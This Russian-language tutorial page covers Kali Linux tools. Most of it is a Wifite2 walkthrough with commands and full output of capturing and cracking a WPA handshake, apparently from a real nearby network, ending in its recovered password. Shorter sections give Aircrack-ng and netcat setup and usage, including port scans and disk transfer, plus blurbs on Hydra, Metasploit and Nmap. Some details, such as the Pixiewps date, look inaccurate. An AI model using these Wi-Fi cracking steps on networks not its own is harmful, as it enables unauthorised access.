Инструменты Kali Linux

Инструменты Kali Linux

Wifite2

 Wifite2 — это мощный инструмент, который автоматизирует взлом Wi-Fi, позволяя вам выбрать цели в зоне покрытия вашего адаптера, а затем подбирает лучшую стратегию взлома для каждой сети.

 

git clone https://github.com/derv82/wifite2.git
cd wifite2
sudo python setup.py install

 

Чтобы проверить, работает ли он, можно набрать wifite -h и увидеть информацию об установленной версии

  

wifite -h

 

Wifite2 сканирует все каналы в поисках всех сетей в зоне покрытия. Затем он ранжирует найденные сети по уровню сигнала.

Wifite2 пройдет по всему списку целей, начиная с самых быстрых и простых атак, таких как WPS-Pixie, которые в считанные секунды могут взломать пароль, до менее надежных тактик, вроде проверок на использование слабых паролей с помощью «атаки по словарю». Если атака не удается или ее завершение занимает слишком много времени, то Wifite2 перейдет к следующей возможной в конкретном случае атаке 

 Если просто запустить Wifite2, набрав в консоли wifite, это позволит скрипту собрать нужную информацию

  

wifite

 

 Если мы знаем, какой канал мы атакуем, то сразу можем его выбрать, добавив команду -c, за которой следует номер канала.

  

wifite -c 11

 

 

 

 

wifite -c 11

  .               .
.´  ·  .     .  ·  `.  wifite 2.1.6
:  :  :  (¯)  :  :  :  automated wireless auditor
`.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
  `     /¯¯¯\     ´

 [+] option: scanning for targets on channel 11
 [!] conflicting process: NetworkManager (PID 464)
 [!] conflicting process: wpa_supplicant (PID 729)
 [!] conflicting process: dhclient (PID 13595)
 [!] if you have problems: kill -9 PID or re-run wifite with --kill)

 [+] looking for wireless interfaces

    Interface   PHY   Driver              Chipset
-----------------------------------------------------------------------
 1. wlan0       phy3  ath9k_htc           Atheros Communications, Inc. AR9271 802.11n

 [+] enabling monitor mode on wlan0... enabled wlan0mon

   NUM                      ESSID   CH  ENCR  POWER  WPS?  CLIENT
   ---  -------------------------  ---  ----  -----  ----  ------
     1              Suicidegirls    11   WPA   48db    no
     2      Bourgeois Pig Guest     11   WPA   45db    no
     3                     BPnet    11   WPA   42db    no
     4      DirtyLittleBirdyFeet    11   WPA   32db    no    5
     5                ATT73qDwuI    11   WPA   32db   yes
     6               SpanishWiFi    11   WPA   24db    no
     7            Franklin Lower    11   WPA   20db    no    3
     8                     Sonos    11   WPA   11db    no
     9            Villa Carlotta    11   WPA   11db    no
    10                     Sonos    11   WPA   10db    no
 [+] select target(s) (1-10) separated by commas, dashes or all: 

 

 Если мы хотим сосредоточиться на легких целях, то мы можем указать скрипту отображать только те цели, которые уязвимы для определенного вида атаки. Чтобы отобразить только цели с WPS, которые могут быть уязвимы для атак от Reaver или Bully, нужно запустить Wifite2 с флагом -wps.

 

 

wifite -wps

  .               .
.´  ·  .     .  ·  `.  wifite 2.1.6
:  :  :  (¯)  :  :  :  automated wireless auditor
`.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
  `     /¯¯¯\     ´

 [+] option: targeting WPS-encrypted networks
 [!] conflicting process: NetworkManager (PID 464)
 [!] conflicting process: wpa_supplicant (PID 729)
 [!] conflicting process: dhclient (PID 14824)
 [!] if you have problems: kill -9 PID or re-run wifite with --kill)

 [+] looking for wireless interfaces

    Interface   PHY   Driver              Chipset
-----------------------------------------------------------------------
 1. wlan0       phy4  ath9k_htc           Atheros Communications, Inc. AR9271 802.11n

 [+] enabling monitor mode on wlan0... enabled wlan0mon

   NUM                      ESSID   CH  ENCR  POWER  WPS?  CLIENT
   ---  -------------------------  ---  ----  -----  ----  ------
     1                 SBG6580E8     1   WPA   45db   yes
     2          The Daily Planet     1   WPA   30db   yes    1
     3                ATT73qDwuI    11   WPA   28db   yes
     4            birds-Wireless     2   WPA   23db   yes
 [+] select target(s) (1-4) separated by commas, dashes or all:

 

 -wpa или -wep, чтобы показать только те цели, которые используют эти типы шифрования.

 

Разные Wi-Fi адаптеры лучше работают с разными скриптами, и это утверждение справедливо для Reaver и Bully

Wifite2 использует по умолчанию Reaver, но вы можете изменить его на Bully, используя флаг -bully.

 

 

wifite -wps -bully

  .               .
.´  ·  .     .  ·  `.  wifite 2.1.6
:  :  :  (¯)  :  :  :  automated wireless auditor
`.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
  `     /¯¯¯\     ´

 [+] option: use bully instead of reaver for WPS Attacks
 [+] option: targeting WPS-encrypted networks
 [!] conflicting process: NetworkManager (PID 464)
 [!] conflicting process: wpa_supplicant (PID 729)
 [!] conflicting process: dhclient (PID 14824)
 [!] if you have problems: kill -9 PID or re-run wifite with --kill)

 [+] looking for wireless interfaces
     using interface wlan0mon (already in monitor mode)
     you can specify the wireless interface using -i wlan0

   NUM                      ESSID   CH  ENCR  POWER  WPS?  CLIENT
   ---  -------------------------  ---  ----  -----  ----  ------
     1                 SBG6580E8     1   WPA   46db   yes
     2          The Daily Planet     1   WPA   34db   yes    1
 [+] select target(s) (1-2) separated by commas, dashes or all: 2
........................................

 

 всегда можем пропустить текущую атаку, нажав Ctrl-C. Это вызовет меню, которое спросит, продолжить или лучше прерваться. Здесь вы можете перейти к следующей атаке, нажав c или s, чтобы совсем остановить Wifite2.

 

 

установив флаг —dict, и затем указать путь до файла, содержащего пароли для взлома. По умолчанию этот путь установлен в /usr/share/wordlists/fern-wifi/common.txt. Этот список содержит много общих паролей, но если вы хотите получить хорошие результаты атак, то лучше использовать свои собственные вордлисты.

Ниже мы успешно расшифровали перехваченное рукопожатие с помощью кастомного словаря «passwords.txt».

 

wifite -wpa --dict ./passwords.txt

  .               .
.´  ·  .     .  ·  `.  wifite 2.1.6
:  :  :  (¯)  :  :  :  automated wireless auditor
`.  ·  ` /¯\ ´  ·  .´  https://github.com/derv82/wifite2
  `     /¯¯¯\     ´

 [+] option: using wordlist ./passwords.txt to crack WPA handshakes
 [+] option: targeting WPA-encrypted networks
 [!] conflicting process: NetworkManager (PID 419)
 [!] conflicting process: wpa_supplicant (PID 585)
 [!] conflicting process: dhclient (PID 7902)
 [!] if you have problems: kill -9 PID or re-run wifite with --kill)

 [+] looking for wireless interfaces
     using interface wlan0mon (already in monitor mode)
     you can specify the wireless interface using -i wlan0

   NUM                      ESSID   CH  ENCR  POWER  WPS?  CLIENT
   ---  -------------------------  ---  ----  -----  ----  ------
     1              Suicidegirls    11   WPA   58db   n/a
     2      Bourgeois Pig Guest     11   WPA   56db   n/a
     3                     BPnet    11   WPA   56db   n/a
     4          The Daily Planet     1   WPA   49db   n/a    1
     5                 SBG6580E8     1   WPA   49db   n/a
     6            Hyla Hair 2.4G     8   WPA   48db   n/a
     7         TWCWiFi-Passpoint     1   WPA   46db   n/a
     8  HP-Print-B9-Officejet...     1   WPA   40db   n/a
     9            birds-Wireless     2   WPA   39db   n/a
    10               SpanishWiFi    11   WPA   38db   n/a
 [!] Airodump exited unexpectedly (Code: ) Command: airodump-ng wlan0mon -a -w /tmp/wifitei_l5H1/airodump --write-interval 1 --output-format pcap,csv
 [+] select target(s) (1-10) separated by commas, dashes or all: 2

 [+] (1/1) starting attacks against DE:F2:86:EC:CA:A0 (Bourgeois Pig Guest )
 [+] Bourgeois Pig Guest  (57db) WPA Handshake capture: Discovered new client: F0:D5:BF:BD:D5:2B
 [+] Bourgeois Pig Guest  (58db) WPA Handshake capture: Discovered new client: 6C:8D:C1:A8:E4:E9
 [+] Bourgeois Pig Guest  (59db) WPA Handshake capture: Listening. (clients:2, deauth:14s, timeout:8m1s)

 [+] successfully captured handshake
 [+] saving copy of handshake to hs/handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap saved

 [+] analysis of captured handshake file:
 [+]   tshark: .cap file contains a valid handshake for de:f2:86:ec:ca:a0
 [!]    pyrit: .cap file does not contain a valid handshake
 [+] cowpatty: .cap file contains a valid handshake for (Bourgeois Pig Guest )
 [+] aircrack: .cap file contains a valid handshake for DE:F2:86:EC:CA:A0

 [+] Cracking WPA Handshake: Using aircrack-ng via passwords.txt wordlist
 [+] Cracking WPA Handshake: 100.00% ETA: 0s @ 2234.0kps (current key: christmasham)
 [+] Cracked WPA Handshake PSK: christmasham

 [+]   Access Point Name: Bourgeois Pig Guest
 [+]  Access Point BSSID: DE:F2:86:EC:CA:A0
 [+]          Encryption: WPA
 [+]      Handshake File: hs/handshake_BourgeoisPigGuest_DE-F2-86-EC-CA-A0_2018-12-24T01-40-28.cap
 [+]      PSK (password): christmasham
 [+] saved crack result to cracked.txt (1 total)
 [+] Finished attacking 1 target(s), exiting

 

Все сломано 

Nessus


Nessus – средство удалённого сканирования, которое подходит для проверки компьютеров на наличие уязвимостей. Сканер не делает активной блокировки любых уязвимостей на вашем компьютере, но быстро обнаруживает их благодаря запуску больше 1200 проверок уязвимостей и выдаёт предупреждения о необходимости конкретных исправлений безопасности.

alt:nessus_4.4

Aircrack-ng

Установка в Debian, Ubuntu, Mint из стандартного репозитория

 

 

sudo apt-get install aircrack-ng

 

 Как правило, в стандартном репозитории неспециализированных дистрибутивов имеется довольно старая версия Aircrack-ng, поэтому, рекомендуется установка из исходников:

 

sudo apt remove aircrack-ng
sudo apt install autoconf automake libpcre3-dev libnl-3-dev libsqlite3-dev libssl-dev ethtool build-essential g++ libnl-genl-3-dev libgcrypt20-dev libtool python3-distutils
sudo apt install -y pkg-config
git clone https://github.com/aircrack-ng/aircrack-ng.git
cd aircrack-ng/
autoreconf -i
./configure --with-experimental --with-ext-scripts
make
sudo make install
sudo airodump-ng-oui-update 

 

Netcat

 Применяется для создания любого типа соединения, а также для исследования и отладки сетей с помощью режима туннелирования, сканирования портов и других фич.

 

sudo apt-get install netcat

 

netcat из исходного кода 

 

wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz

 

 Извлеките недавно загруженный архив

 

tar -xzvf netcat-0.7.1.tar.gz

 

 перейдите в каталог, содержащий исходный код пакета, и введите ./configure, чтобы настроить пакет для вашей системы.

 

cd netcat-0.7.1
./configure

 

 Если вы получаете сообщение об ошибке, подобное этому, — «no acceptable C compiler found in $PATH»» при запуске ./configure, убедитесь, что вы установили gcc-компилятор.

 

 

apt-get install build-essential

 

После успешного завершения настройки выполните: 

 

sudo make
sudo make install

 

Вы можете удалить двоичные файлы программы и объектные файлы из каталога исходного кода, набрав make clean. Чтобы удалить файлы, которые были созданы, выполните команду make distclean. 

 

Как использовать netcat
Прежде чем приступать к изучению некоторых команд netcat, важно знать, что если вы привязываетесь к известным портам (0-1023) с nc, вам нужна привилегия root.

В противном случае вы можете запустить nc как обычный пользователь.

Проверьте, открыт ли конкретный порт TCP удаленного хоста

 

nc -vn 192.168.40.146 2424

 

 если порт 2424 на удаленном сервере закрыт

 

nc: connect to 192.168.40.146 port 2424 (tcp) failed: Connection refused

 

если порт на удаленном сервере открыт (например, 22 порт) 

 

Connection to 192.168.40.146 22 port [tcp/*] succeeded!
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4

 

Выполните проверку TCP-порта на удаленном хосте Приведенная ниже команда проверяет порты от 20 до 25 на удаленном хосте и выводит результат. 

 

nc -vnz -w 1 192.168.40.146 20-25

 

Результат будет выглядеть следующим образом: 

 

nc: connect to 192.168.40.146 port 20 (tcp) failed: Connection refused
nc: connect to 192.168.40.146 port 21 (tcp) failed: Connection refused
Connection to 192.168.40.146 22 port [tcp/*] succeeded!
nc: connect to 192.168.40.146 port 23 (tcp) failed: Connection refused
nc: connect to 192.168.40.146 port 24 (tcp) failed: Connection refused
nc: connect to 192.168.40.146 port 25 (tcp) failed: Connection refused

 

проверка порта UDP на удаленном хосте 

 

 

nc -vnzu 192.168.40.146 1-65535

 

На выводе будут отображаться только порты, которые разрешают соединения udp. 

 

Connection to 192.168.40.146 2424 port [udp/*] succeeded!
Connection to 192.168.40.146 12354 port [udp/*] succeeded!

 

Отправьте тестовый пакет UDP на удаленный хост 

 

echo -n "udp test" | nc -u -w1 192.168.40.146 2424

 

 Приведенная выше команда отправит тестовый пакет UDP с 1 секундой таймаута на удаленный хост на порту 2424

 

Скопируйте файл (например, test.txt) с одного хоста на другой На принимающем хосте (192.168.40.146 в моем случае) выполните: 

 

nc -lp 2424> test.txt

 

На хосте отправителя (192.168.40.144) выполните следующую команду: 

 

nc 192.168.40.146 2424 <test.txt

 

 Это скопирует файл test.txt с хоста отправителя на хост-получатель через порт 2424. убедитесь, что входящие соединения подключены к порту 2424 на хост-ресивере. На хосте:

 

nc -l 2424 | tar xvf -

 

На хосте отправителя выполните следующую команду: 

 

tar cvf - /path/to/dir | nc 192.168.40.146 2424

 

Создайте сжатую резервную копию жесткого диска (например, / dev / sdc) на удаленном хосте При запуске удаленного хоста: 

 

nc -lp 2424 | sudo dd of=/path/to/image.img.gz

 

На локальном хосте выполните следующую команду: 

 

dd if=/dev/sdc | gzip -c | nc 192.168.40.146 2424

 

Восстановите жесткий диск (например, / dev / sdc) из образа сжатого диска, сохраненного на удаленном хосте На локальном хосте: 

 

nc -lp 2424 | gunzip -c | sudo dd of=/dev/sdc

 

На удаленном хосте выполните следующую команду: 

 

cat /path/to/image.img.gz | nc 192.168.40.144 2424

 

Запустите незащищенный онлайн-чат между двумя хостами На одном хосте (например, 192.168.40.144) выполните следующую команду:

 

nc -lp 2424

 

На другом хосте (например, 192.168.40.146) выполните следующую команду: 

 

nc 192.168.40.144 2424

 

После запуска этих команд на обеих машинах будут отображаться все, что набирается на обоих терминалах. 

 

Запустите веб-сервер со статической веб-страницей. Выполните команду ниже на локальном хосте (например, 192.168.40.144), чтобы запустить веб-сервер, обслуживающий test.html на порту 80. Обратите внимание, что вы должны запускать с правами sudo, поскольку 80 находится в диапазоне известных портов (1-1023)  

 

while true; do sudo nc -lp 80 < test.html; done

 

 Теперь откройте http://192.168.40.144/test.html с другого хоста, чтобы получить доступ к нему.

 

Прослушивание TCP-порта с использованием адреса IPv6 

Вы можете использовать следующую команду, чтобы разрешить nc использовать адрес IPv6 при прослушивании на TCP-порту.

 

nc -6 -l 2424< test.html; done

 

Проверьте, работает ли она с приведенной ниже командой 

 

sudo netstat -nap | grep 2424

 

Результат будет выглядеть следующим образом: 

 

tcp6 0 0 :::2424 :::* LISTEN 15665/nc

 

 Поток видеофайла с сервера для клиента для просмотра потокового видео с помощью видеоплеера (например, mplayer) На видеосервере (192.168.40.144):

 

cat sample_video.avi | nc -l 2424

 

 На клиентском хосте (192.168.40.146):

 

nc 192.168.40.144 2424 | mplayer -vo x11 -cache 3000 -

 

 

 

 

 

 

 

 

 

Yersinia

 

Yersinia получила название в честь бактерий иерсиний и стала сетевой утилитой, которая разработана для использования уязвимых сетевых протоколов под видом безопасной сетевой системы анализа и тестирования. Поддерживает атаки для IEEE 802.1Q, протокол HSRP, CDP и другие. 

 

 

 

THC Hydra

 

 THC Hydra использует атаку методом «грубой силы» для хакинга практически любой удалённой службы аутентификации. Поддерживает скоростные переборы по словарю для 50+ протоколов, включая Telnet, HTTPS и FTP. Используйте это средство для взлома веб-сканеров, беспроводных сетей, обработчиков пакетов, Gmail и других вещей.

 

 

 

Pixiewps

 

Pixiewps – написанный на C оффлайн-инструмент атак методом «грубой силы», который используется для программных реализаций с маленькой или отсутствующей энтропией. В 2004 году его разработал Доминик Бонгар, чтобы использовать «pixie-dust атаку» в учебных целях для студентов. В зависимости от надёжности паролей, которые вы пытаетесь взломать, Pixiewps выполнит работу за считаные секунды или минуты. 

 

 

 

 

Metasploit Framework

 

 Metasploit Framework – платформа с открытым исходным кодом, с помощью которой эксперты по безопасности проверяют уязвимости, а также делают оценку безопасности, чтобы повысить осведомлённость в этой области. В этом проекте масса инструментов, с помощью которых вы будете создавать среды безопасности для тестирования уязвимостей. Он работает как система пентеста.

 

 

 

 

Nikto

 

 Nikto2 – бесплатный опенсорс веб-сканер для исчерпывающего и скоростного тестирования объектов в интернете. Это достигается путём поиска больше 6500 потенциально опасных файлов, устаревших программных версий, уязвимых конфигураций серверов и проблем в этой сфере.

 

 

 

Nmap (Network Mapper)

 

Network Mapper – бесплатная опенсорсная утилита, которой пользуются системные администраторы для обнаружения сетей и проверки их безопасности. Nmap быстро работает, поставляется с подробной документацией и графическим интерфейсом, поддерживает передачу данных, инвентаризацию сети и другое.